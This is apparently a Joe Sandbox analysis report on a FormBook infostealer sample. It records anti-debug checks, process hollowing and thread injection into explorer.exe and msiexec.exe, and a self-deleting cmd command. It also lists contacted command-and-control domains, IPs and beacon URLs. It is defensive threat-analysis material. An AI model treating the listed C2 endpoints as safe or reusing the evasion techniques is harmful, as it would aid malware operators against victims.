          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B8794 mov eax, dword ptr fs:[00000030h]7_2_046B8794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04771074 mov eax, dword ptr fs:[00000030h]7_2_04771074
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04762073 mov eax, dword ptr fs:[00000030h]7_2_04762073
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C0050 mov eax, dword ptr fs:[00000030h]7_2_046C0050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C0050 mov eax, dword ptr fs:[00000030h]7_2_046C0050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]7_2_046D002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]7_2_046D002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]7_2_046D002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]7_2_046D002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]7_2_046D002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB02A mov eax, dword ptr fs:[00000030h]7_2_046BB02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB02A mov eax, dword ptr fs:[00000030h]7_2_046BB02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB02A mov eax, dword ptr fs:[00000030h]7_2_046BB02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB02A mov eax, dword ptr fs:[00000030h]7_2_046BB02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA830 mov eax, dword ptr fs:[00000030h]7_2_046CA830
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA830 mov eax, dword ptr fs:[00000030h]7_2_046CA830
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA830 mov eax, dword ptr fs:[00000030h]7_2_046CA830
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA830 mov eax, dword ptr fs:[00000030h]7_2_046CA830
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04774015 mov eax, dword ptr fs:[00000030h]7_2_04774015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04774015 mov eax, dword ptr fs:[00000030h]7_2_04774015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04727016 mov eax, dword ptr fs:[00000030h]7_2_04727016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04727016 mov eax, dword ptr fs:[00000030h]7_2_04727016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04727016 mov eax, dword ptr fs:[00000030h]7_2_04727016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A58EC mov eax, dword ptr fs:[00000030h]7_2_046A58EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8E4 mov eax, dword ptr fs:[00000030h]7_2_046CB8E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8E4 mov eax, dword ptr fs:[00000030h]7_2_046CB8E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A40E1 mov eax, dword ptr fs:[00000030h]7_2_046A40E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A40E1 mov eax, dword ptr fs:[00000030h]7_2_046A40E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A40E1 mov eax, dword ptr fs:[00000030h]7_2_046A40E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]7_2_0473B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0473B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]7_2_0473B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]7_2_0473B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]7_2_0473B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]7_2_0473B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E90AF mov eax, dword ptr fs:[00000030h]7_2_046E90AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]7_2_046D20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]7_2_046D20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]7_2_046D20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]7_2_046D20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]7_2_046D20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]7_2_046D20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DF0BF mov ecx, dword ptr fs:[00000030h]7_2_046DF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DF0BF mov eax, dword ptr fs:[00000030h]7_2_046DF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DF0BF mov eax, dword ptr fs:[00000030h]7_2_046DF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A9080 mov eax, dword ptr fs:[00000030h]7_2_046A9080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04723884 mov eax, dword ptr fs:[00000030h]7_2_04723884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04723884 mov eax, dword ptr fs:[00000030h]7_2_04723884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AC962 mov eax, dword ptr fs:[00000030h]7_2_046AC962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AB171 mov eax, dword ptr fs:[00000030h]7_2_046AB171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AB171 mov eax, dword ptr fs:[00000030h]7_2_046AB171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB944 mov eax, dword ptr fs:[00000030h]7_2_046CB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB944 mov eax, dword ptr fs:[00000030h]7_2_046CB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov eax, dword ptr fs:[00000030h]7_2_046C4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov eax, dword ptr fs:[00000030h]7_2_046C4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov eax, dword ptr fs:[00000030h]7_2_046C4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov eax, dword ptr fs:[00000030h]7_2_046C4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov ecx, dword ptr fs:[00000030h]7_2_046C4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D513A mov eax, dword ptr fs:[00000030h]7_2_046D513A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0040ACE0 LdrLoadDll,1_2_0040ACE0

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.alibabasdeli.com
          Source: C:\Windows\explorer.exeDomain query: www.nanasyhogar.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.173.57 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 50.31.177.38 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.gigasupplies.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 890000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeMemory written: C:\Users\user\Desktop\nji3Lg1ot6.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.322349912.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.373413712.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.297387525.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000003.00000000.311624897.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.330530785.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.314804164.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.303384073.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405AA7

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1DLL Side-Loading1Process Injection612Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552997 Sample: nji3Lg1ot6 Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 33 www.mnbvending.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 5 other signatures 2->47 11 nji3Lg1ot6.exe 19 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\mtmmtvzho.dll, PE32 11->31 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 59 Injects a PE file into a foreign processes 11->59 15 nji3Lg1ot6.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 35 nanasyhogar.com 50.31.177.38, 49793, 80 SERVERCENTRALUS United States 18->35 37 www.alibabasdeli.com 172.67.173.57, 49808, 80 CLOUDFLARENETUS United States 18->37 39 4 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 msiexec.exe 18->22         started        25 autochk.exe 18->25         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          nji3Lg1ot6.exe38%VirustotalBrowse
          nji3Lg1ot6.exe42%ReversingLabsWin32.Worm.SpyBot
          nji3Lg1ot6.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.msiexec.exe.4baf840.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.msiexec.exe.2c5b358.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.nji3Lg1ot6.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.nji3Lg1ot6.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nji3Lg1ot6.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.nji3Lg1ot6.exe.23e0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nji3Lg1ot6.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nji3Lg1ot6.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.mnbvending.com0%VirustotalBrowse
          www.alibabasdeli.com0%VirustotalBrowse
          shops.myshopify.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf0%Avira URL Cloudsafe
          www.rthearts.com/nk6l/0%Avira URL Cloudsafe
          http://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf0%Avira URL Cloudsafe
          http://www.gigasupplies.com/nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.mnbvending.com
          		199.59.243.200
          		truefalseunknown
          www.alibabasdeli.com
          		172.67.173.57
          		truetrueunknown
          nanasyhogar.com
          		50.31.177.38
          		truetrue
            		unknown
            shops.myshopify.com
            		23.227.38.74
            		truetrueunknown
            www.nanasyhogar.com
            		unknown
            		unknowntrue
              		unknown
              www.gigasupplies.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bftrue
                • Avira URL Cloud: safe
                		unknown
                www.rthearts.com/nk6l/true
                • Avira URL Cloud: safe
                		low
                http://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bftrue
                • Avira URL Cloud: safe
                		unknown
                http://www.gigasupplies.com/nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bftrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_Errornji3Lg1ot6.exefalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorErrornji3Lg1ot6.exefalse
                    		high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.173.57
                    		www.alibabasdeli.comUnited States
                    		13335CLOUDFLARENETUStrue
                    23.227.38.74
                    		shops.myshopify.comCanada
                    		13335CLOUDFLARENETUStrue
                    50.31.177.38
                    		nanasyhogar.comUnited States
                    		23352SERVERCENTRALUStrue

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:552997
                    Start date:14.01.2022
                    Start time:03:36:23
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 11s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:nji3Lg1ot6 (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@8/4@4/4
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 24.2% (good quality ratio 21.8%)
                    • Quality average: 74.1%
                    • Quality standard deviation: 31.3%
                    HCA Information:
                    • Successful, ratio: 86%
                    • Number of executed functions: 94
                    • Number of non-executed functions: 57
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    23.227.38.74PO789.docGet hashmaliciousBrowse
                    • www.prestigiousuniforms.com/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i
                    ihJ4eSV1of.exeGet hashmaliciousBrowse
                    • www.theyouthwave.com/i5nb/?DTSDW=JsFJPXZiLS4NaijNzABLBoURvmeoFie1Ordoaxf1WOmZEGr92PFrk02sXA4IYmalOV9G&vP=5jix
                    Proforma-Invoice.exeGet hashmaliciousBrowse
                    • www.sculpturehairandfashion.com/eb4c/?4hjDF0=P6Asbbp35dVbx0ZtMranlNi8cOD6gZ7tU8O91sGcdVH43MTDCTnQI916feAuUIMvG0Wq&m6ATSH=-ZnDHT28LD
